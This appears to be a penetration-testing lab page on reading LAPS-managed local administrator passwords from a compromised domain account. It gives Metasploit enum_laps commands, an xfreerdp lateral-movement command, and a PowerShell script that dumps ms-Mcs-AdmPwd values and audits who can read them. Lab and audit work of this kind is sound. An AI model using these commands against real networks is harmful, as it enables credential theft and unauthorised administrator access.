AJ-Labz
LAPS Reader

If the compromised user is a member of the group that has been delegated read access to the LAPS password attribute (ms-Mcs-AdmPwd; in this lab the group is called PswReaders), you can read the managed local administrator password of every computer that delegation covers. To abuse this from a Meterpreter session, run the enum_laps post module against that session (# is the session ID):

```
msf5 > use post/windows/gather/credentials/enum_laps
msf5 post(windows/gather/credentials/enum_laps) > set SESSION #
SESSION => #
msf5 post(windows/gather/credentials/enum_laps) > run
```

The module lists the computers whose LAPS password this user can read. Pick a host that exposes a management service you can reach and move laterally with the recovered local administrator password, for example over RDP:

```
xfreerdp /u:administrator /v:192.168.X.Y /w:1200 /h:1000
[10:57:29:033] [36184:36185] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
Password: LAPSpassword
```

Enter the password returned by enum_laps at the prompt. LAPS manages the built-in Administrator account (RID 500) unless a custom account name was set in the LAPS policy, so check the managed account name if /u:administrator is rejected. To make the local-account logon explicit, add /d:<hostname> so the credential is sent as HOSTNAME\administrator rather than as a domain account.
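The same LDAP lookup that enum_laps performs, plus the check of who is actually allowed to read the attribute, done in PowerShell from a domain-joined host. This is an added example, not code from the AJ-Labz page or from any LAPS tooling; it assumes a domain-joined Windows box and a PowerShell session running as the compromised domain user, uses only built-in ADSI (no RSAT module), and the OU distinguished name in the usage lines is a placeholder for the lab.

```powershell
# Added example (not from the original page). Assumes a domain-joined Windows host and a
# PowerShell session as the compromised domain user; only built-in ADSI is used.
# The OU DN used at the bottom is an assumed lab value.

function Get-LapsPasswords {
    # Pull ms-Mcs-AdmPwd and its expiration time from every LAPS-managed computer.
    # The DC silently omits ms-Mcs-AdmPwd for principals without read rights, so a
    # null Password means "not readable as this user", not "LAPS not deployed".
    # ms-Mcs-AdmPwdExpirationTime is not confidential, so it identifies LAPS-enabled hosts.
    $searcher = [adsisearcher]'(&(objectCategory=computer)(ms-Mcs-AdmPwdExpirationTime=*))'
    $searcher.PageSize = 500
    $searcher.PropertiesToLoad.AddRange([string[]]@('name', 'dnshostname', 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime'))

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties   # keys are lower-case
        $password = if ($p['ms-mcs-admpwd'].Count) { $p['ms-mcs-admpwd'][0] } else { $null }
        $expires = if ($p['ms-mcs-admpwdexpirationtime'].Count) {
            # Stored as a Windows FILETIME (100 ns ticks since 1601-01-01 UTC)
            [DateTime]::FromFileTimeUtc([int64]$p['ms-mcs-admpwdexpirationtime'][0])
        } else { $null }
        $target = if ($p['dnshostname'].Count) { $p['dnshostname'][0] } else { $p['name'][0] }

        [pscustomobject]@{ Computer = $target; Password = $password; Expires = $expires }
    }
}

function Get-LapsReaders {
    param([Parameter(Mandatory)][string]$SearchBase)   # DN of the OU holding the computers
    # Which principals can read the password on computers under $SearchBase?
    # ms-Mcs-AdmPwd is a confidential attribute, so ReadProperty alone is not enough:
    # the ACE must carry CONTROL_ACCESS (ExtendedRight) scoped to the attribute (or to
    # every object type). GenericAll already includes the ExtendedRight bit.
    $rootDse    = [ADSI]'LDAP://RootDSE'
    $schemaObj  = [ADSI]"LDAP://CN=ms-Mcs-AdmPwd,$($rootDse.schemaNamingContext)"
    $admPwdGuid = New-Object System.Guid -ArgumentList (,[byte[]]$schemaObj.schemaIDGUID.Value)
    $extended   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

    $ou    = [ADSI]"LDAP://$SearchBase"
    $rules = $ou.psbase.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

    foreach ($rule in $rules) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        # Guid.Empty means the ACE applies to all attributes / extended rights on the object
        $coversAttr = ($rule.ObjectType -eq $admPwdGuid) -or ($rule.ObjectType -eq [guid]::Empty)
        $hasControl = (($rule.ActiveDirectoryRights -band $extended) -ne 0)
        if ($coversAttr -and $hasControl) {
            [pscustomobject]@{
                Identity  = $rule.IdentityReference.Value
                Rights    = $rule.ActiveDirectoryRights
                Inherited = $rule.IsInherited
            }
        }
    }
}

# Usage (assumed lab OU):
Get-LapsReaders -SearchBase 'OU=Workstations,DC=lab,DC=local' | Format-Table -AutoSize
Get-LapsPasswords | Where-Object Password | Format-Table -AutoSize
```

Get-LapsReaders is the check to run first: if the current user's groups do not appear in its output for the OU in question, Get-LapsPasswords will return computers with an empty Password column and no error, which is easy to misread as LAPS not being deployed. The FILETIME conversion matters because an expired password that has not yet been rotated is still valid on the host.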
Last updated 3 years ago